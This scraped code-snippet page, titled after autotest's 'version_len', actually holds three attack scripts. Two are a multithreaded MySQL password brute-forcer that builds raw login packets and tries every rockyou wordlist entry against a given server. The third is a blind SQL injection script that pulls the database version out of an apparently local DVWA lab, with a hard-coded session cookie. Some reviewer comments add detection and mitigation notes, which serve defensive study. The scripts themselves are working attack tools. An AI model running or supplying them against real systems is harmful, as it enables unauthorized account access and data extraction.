How to use version_len method in autotest

Best Python code snippet using autotest_python

mysqlcheckMemMapMutiThread.py

Source:mysqlcheckMemMapMutiThread.py Github


# Python3 compatible
# Mysql password cracker, works with Secure Password Authentication algorithm
# https://dev.mysql.com/doc/internals/en/secure-password-authentication.html
# Nov 2020
# Author: Ivica Stipovic
# Sidenote: make sure you do not have "skip-grant-tables" in your my mySql config file
# If you do, any connect attempt will return OK server response / will allow anonymous access
# This code is functionally relative close to the Metasploit auxiliary/scanner/mysql_login module
#
# Review notes (defender's view; indentation below was reconstructed because
# the page's extraction flattened it):
# - The loop makes one TCP connection to port 3306 and one login attempt per
#   wordlist line. On the server this should appear as a run of short-lived
#   connections from one source, each carrying a single authentication
#   attempt for the same account.
# - Controls that act on exactly this pattern: failed-login logging and
#   alerting, connection throttling (e.g. MySQL's connection_control plugin),
#   per-account lockout (FAILED_LOGIN_ATTEMPTS / PASSWORD_LOCK_TIME), and not
#   exposing 3306 beyond the hosts that need it. Confirm availability for the
#   server version in use.
# - A candidate is only ever matched if the account's password is in the
#   wordlist, so password-policy enforcement addresses the root cause.

import socket
import sys
import time
import timeit
import struct
from hashlib import sha1
import mmap
import threading

# Never read or updated in the code shown.
pass_found=0

def calculation(username_binary: bytes, TCP_IP: str, TCP_PORT: int) -> None:
    """Send one login attempt per remaining wordlist line and report matches.

    Candidates are read from the module-level mmap object ``m``, which is
    assigned inside the ``with`` block at the bottom of the file; both worker
    threads call ``m.readline`` on that same object. For every candidate a new
    socket is opened, the server greeting is parsed for the version string and
    the two salt fragments, a login packet is assembled and sent, and the
    candidate is printed when byte 5 of the reply equals 0.

    Args:
        username_binary: Account name, already encoded to bytes.
        TCP_IP: Address of the server to connect to.
        TCP_PORT: TCP port of the server.

    Returns:
        None. Results are only printed; the loop contains no ``break``, so it
        runs until ``m.readline`` returns ``b""``.
    """

    #Iterate through the passwords, make hash out of each one
    # The biggest issue is that network sockets don't fit with CUDA - Device IO communication is not managed by CUDA
    # Network sockets probably require multithreading with CPU

    # Flag so the version banner is printed only once per thread.
    dbversion=0

    for line in iter(m.readline,b""):

        # A fresh connection per candidate: the greeting (and its salt) is new each time.
        sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sock.connect((TCP_IP,TCP_PORT))
        # A single read of up to 1024 bytes is treated as the complete greeting.
        version,addr=sock.recvfrom(1024)

        # payload_len is assigned but not used afterwards.
        payload_len=version[0]
        ver_offset=5
        version_len=0
        a=0

        # Count bytes from offset 5 up to the first zero byte (the version string).
        while(version[a+ver_offset]!=0):
            version_len+=1
            a+=1

        if dbversion==0:
            print ("[+] Database version =", version[5:5+version_len].decode('utf-8'))
            dbversion=1

        # You must calculate the version string length to get to salts
        # move to 6th byte of the response and loop until first \00 terminator
        # Count the bytes and calculate len of the Version field

        # Slice widths are 8 and 12 bytes, i.e. 20 bytes of salt in total.
        salt1=version[10+version_len:18+version_len] # -1 to cut off null terminator
        salt2=version[37+version_len:49+version_len] # -1 to cut off null terminator

        salt=salt1+salt2
        salt3=bytearray()
        salt3.extend(salt)

        # Candidate password as bytes, trailing whitespace/newline removed.
        line2=line.rstrip()

        # Payload length: 55 fixed bytes plus the username, encoded as 3 little-endian bytes.
        datalen=int(55+len(username_binary))
        datalen2=datalen.to_bytes(3,'little')

        # hash=SHA1(password) XOR SHA1(s+SHA1(SHA1(password))), s=salt of 20 bytes
        bytes1 = sha1(line2).digest()

        concat1 = salt3
        concat2 = sha1(sha1(line2).digest()).digest()

        bytes3=bytearray()
        concat=concat1+concat2
        bytes3.extend(concat)
        bytes3=sha1(bytes3).digest()

        # Byte-wise XOR of the two 20-byte SHA-1 digests.
        hash=bytearray(x ^ y for x, y in zip(bytes1, bytes3))
        pass_hash=hash

        # The fields below are constant for every attempt apart from the
        # username and scramble, which gives the traffic a fixed byte pattern.
        data=datalen2 # Ensure length field is 3 bytes (hence +\x00\x00)
        data +=b'\x01' # packet number=1
        data +=b'\x0d\xa2' # Client capabilities -> careful with that!!
        data +=b'\x00\x00' # Extended capabilities=0
        data +=b'\x00\x00\x00\x40' # Max size
        data +=b'\x08' # Charset=8 latin1
        data +=b'\x00' *23 # 23 bytes are reserved=0
        data +=username_binary # Username (from input parameter) with 00 termination
        data +=b'\x00' # Username NULL terminator
        data +=b'\x14' # 0x14 = 20, the size of the scramble appended next; the original author marked this byte as undocumented - presumably the auth-response length prefix, confirm against the protocol docs
        data +=pass_hash
        data +=b'\x00'

        sock.sendall(data)
        authcode,addr=sock.recvfrom(1024)

        # Byte 5 of the reply equal to 0 is treated as a successful login.
        if authcode[5]==0:
            print ("[+] Password found:",line2)
            sock.close()

        # The socket is closed right after the reply; nothing else is sent on it.
        sock.close()


# End of function/subroutine

if len(sys.argv)!=3:

    print ("Usage: python {} <ip address> <username>".format(sys.argv[0]))
    sys.exit()

TCP_IP =sys.argv[1]
username =sys.argv[2]
username_binary =username.encode('utf-8')
TCP_PORT =3306
# Assigned but not used in the code shown.
data_calculated=b""

start = timeit.default_timer()

# we're doing memory mapped file search to speed up stuff
# Start of the subroutine/function

with open("rockyou2.txt","rb") as f:
    # `m` becomes a module-level name that calculation() reads.
    m=mmap.mmap(f.fileno(),length=0,access=mmap.ACCESS_READ)
    # Reads the first wordlist line here; the value is not used afterwards.
    passx=m.readline().rstrip()

    #Multithreading
    t1=threading.Thread(target=calculation,args=(username_binary,TCP_IP,TCP_PORT,))
    t2=threading.Thread(target=calculation,args=(username_binary,TCP_IP,TCP_PORT,))

    t1.start()
    t2.start()

    #Wait for threads to finish

    t1.join()
    t2.join()
    stop = timeit.default_timer()
    execution_time = stop - start

    print("[+] Program Executed in "+str(execution_time))


mysqlcheck4.py

Source:mysqlcheck4.py Github


1# Python3 compatible2# Mysql password cracker, works with Secure Password Authentication algorithm3# https://dev.mysql.com/doc/internals/en/secure-password-authentication.html4# Nov 20205# Author: Ivica Stipovic6# Sidenote: make sure you do not have "skip-grant-tables" in your my mySql config file7# If you do, any connect attempt will return OK server response / will allow anonymous access8# This code is functionally relative close to the Metasploit auxiliary/scanner/mysql_login module910import socket11import sys12import time13import struct14from hashlib import sha11516if len(sys.argv)!=3:1718 print ("Usage: python mysqlcheck.py <ip address> <username>")19 sys.exit()2021TCP_IP =sys.argv[1]22username =sys.argv[2]23username_binary =username.encode('utf-8')24TCP_PORT =33062526f=open("rockyou2.txt","r") 2728passx=f.readlines() 2930#Iterate through the passwords, make hash out of each one31dbversion=03233for line in passx:3435 sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)36 sock.connect((TCP_IP,TCP_PORT))37 version,addr=sock.recvfrom(1024)38 39 payload_len=version[0]40 ver_offset=541 version_len=042 a=04344 while(version[a+ver_offset]!=0):45 version_len+=146 a+=14748 if dbversion==0:49 print ("Database version =", version[5:5+version_len].decode('utf-8'))50 dbversion=15152# You must calculate the version string length to get to salts53# move to 6th byte of the response and loop until first \00 terminator54# Count the bytes and calculate len of the Version field5556 salt1=version[10+version_len:18+version_len] # -1 to cut off null terminator57 salt2=version[37+version_len:49+version_len] # -1 to cut off null terminator5859 salt=salt1+salt260 salt3=bytearray()61 salt3.extend(salt)62 63 line2=line.rstrip()6465 datalen=int(55+len(username_binary))66 datalen2=datalen.to_bytes(3,'little') 6768# hash=SHA1(password) XOR SHA1(s+SHA1(SHA1(password))), s=salt of 20 bytes69 bytes1 = sha1(line2.encode('utf-8')).digest()70 71 concat1 = salt372 concat2 = 
sha1(sha1(line2.encode('utf-8')).digest()).digest()73 74 bytes3=bytearray()75 concat=concat1+concat276 bytes3.extend(concat)77 bytes3=sha1(bytes3).digest()78 79 hash=bytearray(x ^ y for x, y in zip(bytes1, bytes3))80 pass_hash=hash81 82 data=datalen2 # Ensure length field is 3 bytes (hence +\x00\x00)83 data +=b'\x01' # packet number=184 data +=b'\x0d\xa2' # Client capabilities -> careful with that!!85 data +=b'\x00\x00' # Extended capabilities=086 data +=b'\x00\x00\x00\x40' # Max size87 data +=b'\x08' # Charset=8 latin188 data +=b'\x00' *23 # 23 bytes are reserved=089 data +=username_binary # Username (from input parameter) with 00 termination 90 data +=b'\x00' # Username NULL terminator91 data +=b'\x14' # Not documented and wireshaek has no idea what this is!!92 data +=pass_hash93 data +=b'\x00'94 95 sock.sendall(data)96 authcode,addr=sock.recvfrom(1024)9798 99 if (authcode[5]==21 and authcode[6])==4: #Error code for "access denied"100 print ("Access denied for password:",line2)101 else:102 if authcode[5]==0:103 print ("Password found:",line2) ...


sqli_blind_medium.py

Source:sqli_blind_medium.py Github


# NOTE(review): lines 1-2 of the original file are not shown on this page;
# `requests` and `BeautifulSoup`, used below, are presumably imported there.
#
# Review notes (defender's view; indentation reconstructed from a flattened
# listing):
# - Both probes put a boolean SQL condition after the numeric value in the
#   `id` form field. That only yields an answer if the application places
#   `id` into its query without binding or integer-casting it (server code is
#   not shown - presumably the case here). Binding `id` as a query parameter
#   removes the oracle.
# - The oracle is the page text: "User ID exists in the database." versus any
#   other response. Returning one uniform response for all failures narrows it.
# - The traffic is a long run of near-identical POSTs whose `id` differs only
#   by a counter and contains `@@VERSION`, `length(` or `ascii(substr(`, which
#   is a usable signature for request logging or WAF rules.
# - The URL path and the `security` cookie look like a DVWA lab instance on
#   localhost - confirm.
import urllib
# LIMIT is defined but the functions below use the literal 100 instead.
LIMIT = 100
# A session identifier hard-coded in source; anyone with the file can reuse
# it while the session is valid, so treat it as exposed.
PHPSESSID = "vj4j0b0s5vo65mdd54ohullaq4"
SECURITY = "medium"
def get_db_version_len() -> int:
    """Return the length of the server's ``@@VERSION`` string.

    Sends one POST per candidate length, starting at 1, and returns the first
    length for which the page's ``<pre>`` text equals
    "User ID exists in the database.".

    Raises:
        ValueError: After the attempt with length 100 has not matched.
    """
    version_len = 0
    while True:
        version_len += 1
        url = f"http://localhost/vulnerabilities/sqli_blind/"
        header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36",
                  "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                  "Accept-Encoding": "gzip, deflate",
                  "Accept-Language": "en-US,en;q=0.9",
                  "Connection": "close",
                  "Upgrade-Insecure-Requests": "1"}

        # Requests are routed through a local proxy on 127.0.0.1:8080.
        burp_proxy = {"http": "http://127.0.0.1:8080",
                      "https": "https://127.0.0.1:8080"
                      }
        # The condition is true only when the version string has this length.
        burp_data = {"id": f"1 and length(@@VERSION)={version_len}",
                     "Submit": "Submit"}

        cookies = {"PHPSESSID":PHPSESSID, "security":SECURITY}
        response = requests.post(url, data=burp_data, cookies=cookies, headers=header, proxies=burp_proxy)

        html_doc = response.content.decode()
        soup = BeautifulSoup(html_doc, 'html.parser')
        # The first <pre> element's text is the true/false signal.
        if soup.pre.text == "User ID exists in the database.":
            return version_len
        if version_len >= 100:
            raise ValueError(f'Tried {version_len} time but table len not found')

def get_db_ver_char_ascii(digit: int) -> str:
    """Return the character at 1-based position ``digit`` of ``@@VERSION``.

    Sends one POST per candidate code point, starting at 1, and returns
    ``chr()`` of the first value the page confirms.

    Raises:
        ValueError: Once the candidate value has passed 127 without a match.
    """
    target_ascii = 0
    while True:
        target_ascii += 1
        url = f"http://localhost/vulnerabilities/sqli_blind/"
        header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36",
                  "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                  "Accept-Encoding": "gzip, deflate",
                  "Accept-Language": "en-US,en;q=0.9",
                  "Connection": "close",
                  "Upgrade-Insecure-Requests": "1"}

        # Same local proxy as in get_db_version_len.
        burp_proxy = {"http": "http://127.0.0.1:8080",
                      "https": "https://127.0.0.1:8080"
                      }
        # The condition is true only when the character at `digit` has this code.
        burp_data = {"id": f"1 and ascii(substr(@@VERSION,{digit},1))={target_ascii}",
                     "Submit": "Submit"}

        cookies = {"PHPSESSID":PHPSESSID, "security":SECURITY}
        response = requests.post(url, data=burp_data, cookies=cookies, headers=header, proxies=burp_proxy)

        html_doc = response.content.decode()
        soup = BeautifulSoup(html_doc, 'html.parser')
        if soup.pre.text == "User ID exists in the database.":
            return chr(target_ascii)
        if target_ascii > 127:
            raise ValueError(f'char not found on {digit}')
def get_db_ver(name_len: int) -> str:
    """Assemble the version string by querying positions 1..``name_len``."""
    # Despite its name, table_name accumulates the version string.
    table_name = ""
    for idx in range(1, name_len + 1):
        table_name += get_db_ver_char_ascii(idx)
    return table_name
if __name__ == "__main__":
    # First recover the length, then the string itself, printing both.
    db_version_len = get_db_version_len()
    print(db_version_len)
    db_version = get_db_ver(db_version_len)
    print(db_version)
